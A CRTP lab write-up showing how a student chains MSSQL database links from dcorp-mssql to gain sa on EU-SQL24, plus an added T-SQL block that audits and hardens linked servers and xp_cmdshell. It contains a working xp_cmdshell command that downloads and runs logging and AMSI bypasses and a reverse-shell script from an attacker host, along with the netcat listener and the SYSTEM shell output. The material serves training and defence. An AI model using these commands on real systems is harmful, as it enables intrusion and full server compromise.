CRTP Lab 22

Task

Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.

First, enumerate the SQL servers in the domain and check whether the student user has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.

PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.

PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
VERBOSE:  Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:

The link chain reaches EU-SQL24 as the sa login, so we have sysadmin on that server.

If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.
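As an added, defender-side example that is not part of the lab, the following T-SQL audits on a single instance the three conditions the crawl above relies on (a link mapped to a privileged login such as sa, RPC out enabled on the link, and xp_cmdshell switched on) and shows the matching hardening statements. The link name DCORP-SQL1 comes from the crawl output; link_reader and <LINK_PASSWORD> are placeholders.

```sql
-- Added audit example (not part of the lab). Run on each instance in the chain,
-- starting from dcorp-mssql, to see what a link crawl would find there.

-- 1. Every linked server and the remote login each link authenticates as.
--    A fixed remote_name such as 'sa' means any caller allowed to use the link
--    reaches the next hop with that login's privileges, regardless of their own.
SELECT s.name               AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,            -- 1 = EXEC ... AT link is permitted
       ll.uses_self_credential,         -- 1 = caller's own identity is forwarded
       ll.remote_name                   -- fixed remote login, if any
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. What the link actually gets on the remote side; this is the "Link Login"
--    and "Link IsSysAdmin" information shown in the crawl output.
EXEC ('SELECT SYSTEM_USER AS link_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin;')
    AT [DCORP-SQL1];

-- 3. Whether xp_cmdshell is enabled on this instance (value_in_use = 1).
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Hardening (each statement stands on its own):

-- Disable xp_cmdshell so a sysadmin-level link cannot become OS command execution.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;

-- Block remote procedure calls through the link. OPENQUERY-style reads still
-- work, but EXEC ... AT and remote stored-procedure calls no longer do.
EXEC sp_serveroption @server = N'DCORP-SQL1', @optname = N'rpc out', @optvalue = N'false';

-- Replace the sa mapping with a dedicated least-privilege remote login.
-- link_reader must already exist on the remote instance; <LINK_PASSWORD> is a placeholder.
EXEC sp_addlinkedsrvlogin @rmtsrvname = N'DCORP-SQL1', @useself = N'false',
     @locallogin = NULL, @rmtuser = N'link_reader', @rmtpassword = N'<LINK_PASSWORD>';
```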

To avoid dealing with a large number of quotes and escapes, use the following command:

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"

To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1.

Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.

Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Host the files on the attacker's HTTP server and start a listener using netcat.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql24

On Listener:

C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\

C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
